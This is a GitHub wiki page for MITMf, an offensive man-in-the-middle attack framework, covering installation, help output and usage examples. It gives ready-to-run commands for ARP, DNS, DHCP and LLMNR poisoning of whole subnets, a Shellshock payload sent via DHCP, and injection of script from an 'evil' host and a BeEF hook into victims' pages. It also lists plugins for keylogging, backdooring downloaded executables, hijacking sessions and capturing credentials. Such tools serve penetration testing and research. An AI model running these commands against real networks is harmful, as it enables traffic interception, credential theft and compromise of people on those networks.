- Saved searches
- Use saved searches to filter your results more quickly
- Installation
- MITMf
- Features
- Active packet filtering/modification
- MITMf Help
- MITMf Usage Example
- How to install MITMf
- Installation on Kali Linux
- Installation on BlackArch
- Installation on Linux (Debian, Mint, Ubuntu)
- MITMf Screenshots
- MITMf Tutorials
- Currently available plugins
- Related tools
Saved searches
Use saved searches to filter your results more quickly
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.
byt3bl33d3r / MITMf Public archive
Installation
Clone this wiki locally
#Installation MITMf relies on a LOT of external libraries therefore it is highly recommended you use virtualenvs to install the framework, this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).
Before starting the installation process:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
#Installing MITMf Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv
pip install virtualenvwrapper
source /usr/bin/virtualenvwrapper.sh
The location of this script may vary depending on your Linux distro
source /usr/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
MITMf
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
Features
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
- Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:
if packet.haslayer(ICMP): log.info('Got an ICMP packet!') packet.dst = '192.168.1.0'
- Use the packet variable to access the packet in a Scapy compatible format
- Use the data variable to access the raw packet data
Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py
You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉
Note: you can modify filters on-the-fly without restarting MITMf!
MITMf Help
usage: mitmf.py -i interface [mitmf options] [plugin name] [plugin options]
optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit MITMf: Options for MITMf --log-level Specify a log level [default: info] -i INTERFACE Interface to listen on -c CONFIG_FILE Specify config file to use -p, --preserve-cache Don't kill client/server caching -r READ_PCAP, --read-pcap READ_PCAP Parse specified pcap for credentials and exit -l PORT Port to listen on (default 10000) -f, --favicon Substitute a lock favicon on secure requests. -k, --killsessions Kill sessions in progress. -F FILTER, --filter FILTER Filter to apply to incoming traffic Upsidedownternet: Flips images 180 degrees --upsidedownternet Load plugin 'Upsidedownternet' AppCachePoison: Performs App Cache Poisoning attacks --appoison Load plugin 'AppCachePoison' Inject: Inject arbitrary content into HTML content --inject Load plugin 'Inject' --js-url JS_URL URL of the JS to inject --js-payload JS_PAYLOAD JS string to inject --js-file JS_FILE File containing JS to inject --html-url HTML_URL URL of the HTML to inject --html-payload HTML_PAYLOAD HTML string to inject --html-file HTML_FILE File containing HTML to inject --per-domain Inject once per domain per client. --rate-limit RATE_LIMIT Inject once every RATE_LIMIT seconds per client. --count-limit COUNT_LIMIT Inject only COUNT_LIMIT times per client. --white-ips IP Inject content ONLY for these ips (comma seperated) --black-ips IP DO NOT inject content for these ips (comma seperated) --white-domains DOMAINS Inject content ONLY for these domains (comma seperated) --black-domains DOMAINS DO NOT inject content for these domains (comma seperated) BrowserProfiler: Attempts to enumerate all browser plugins of connected clients --browserprofiler Load plugin 'BrowserProfiler' HTA Drive-By: Performs HTA drive-by attacks on clients --hta Load plugin 'HTA Drive-By' --text TEXT Text to display on notification bar --hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] SSLstrip+: Enables SSLstrip+ for partial HSTS bypass --hsts Load plugin 'SSLstrip+' SMBTrap: Exploits the SMBTrap vulnerability on connected clients --smbtrap Load plugin 'SMBTrap' SMBAuth: Evoke SMB challenge-response auth attempts --smbauth Load plugin 'SMBAuth' JSKeylogger: Injects a javascript keylogger into clients webpages --jskeylogger Load plugin 'JSKeylogger' BrowserSniper: Performs drive-by attacks on clients with out-of-date browser plugins --browsersniper Load plugin 'BrowserSniper' FilePwn: Backdoor executables being sent over http using bdfactory --filepwn Load plugin 'FilePwn' Replace: Replace arbitrary content in HTML content --replace Load plugin 'Replace' ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screenshots will be taken (default 10 seconds) ImageRandomizer: Replaces images with a random one from a specified directory --imgrand Load plugin 'ImageRandomizer' --img-dir DIRECTORY Directory with images Ferret-NG: Captures cookies and starts a proxy that will feed them to connected clients --ferretng Load plugin 'Ferret-NG' --port PORT Port to start Ferret-NG proxy on (default 10010) --load-cookies FILE Load cookies from a log file Responder: Poison LLMNR, NBT-NS and MDNS requests --responder Load plugin 'Responder' --analyze Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning --wredir Enables answers for netbios wredir suffix queries --nbtns Enables answers for netbios domain suffix queries --fingerprint Fingerprint hosts that issued an NBT-NS or LLMNR query --lm Force LM hashing downgrade for Windows XP/2003 and earlier --wpad Start the WPAD rogue proxy server --forcewpadauth Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt) --basic Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned Spoof: Redirect/Modify traffic using ICMP, ARP, DHCP or DNS --spoof Load plugin 'Spoof' --arp Redirect traffic using ARP spoofing --icmp Redirect traffic using ICMP redirects --dhcp Redirect traffic using DHCP offers --dns Proxy/Modify DNS queries --netmask NETMASK The netmask of the network --shellshock PAYLOAD Trigger the Shellshock vuln when spoofing DHCP, and execute specified command --gateway GATEWAY Specify the gateway IP --gatewaymac GATEWAYMAC Specify the gateway MAC [will auto resolve if ommited] --targets TARGETS Specify host/s to poison [if ommited will default to subnet] --ignore IGNORE Specify host/s not to poison --arpmode ARP Spoofing mode: replies (rep) or requests (req) [default: rep]
MITMf Usage Example
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Same as above + a WPAD rogue proxy server using the Responder plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Enable LLMNR/NBTNS/MDNS spoofing:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dhcp
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run
How to install MITMf
Installation on Kali Linux
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libxml2-dev libxslt1-dev pip install virtualenvwrapper source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 pip install requests[security] git clone https://github.com/byt3bl33d3r/MITMf cd MITMf && git submodule init && git submodule update --recursive pip install -r requirements.txt python mitmf.py --help
After reboot go to the directory with the installed program:
source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 python mitmf.py --help
Installation on BlackArch
pacman -S mitmf python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone sudo pip install virtualenvwrapper source /usr/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 pip install requests[security] cd /usr/share/mitmf/ pip install -r requirements.txt cd sudo python /usr/share/mitmf/mitmf.py --help
Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh
Installation on Linux (Debian, Mint, Ubuntu)
sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev python-pip git libxml2-dev libxslt1-dev libffi-dev libjpeg-dev libffi-dev libssl-dev libnfnetlink* libnetfilter-queue-dev sudo pip install capstone sudo pip install virtualenvwrapper sudo -s source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 sudo pip install requests[security] git clone https://github.com/byt3bl33d3r/MITMf cd MITMf && git submodule init && git submodule update --recursive pip install -r requirements.txt python mitmf.py --help
After reboot go to the directory with the installed program:
sudo -s source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 python mitmf.py --help
MITMf Screenshots
The program is a command-line utility.
MITMf Tutorials
Currently available plugins
- HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
- SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
- ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
- SSLstrip+ : Partially bypass HSTS
- Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
- AppCachePoison : Performs HTML5 App-Cache poisoning attacks
- Ferret-NG : Transperently hijacks client sessions
- BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
- FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- Inject : Inject arbitrary content into HTML content
- BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
- JSkeylogger : Injects a Javascript keylogger into a client’s webpages
- Replace : Replace arbitrary content in HTML content
- SMBAuth : Evoke SMB challenge-response authentication attempts
- Upsidedownternet : Flips images 180 degrees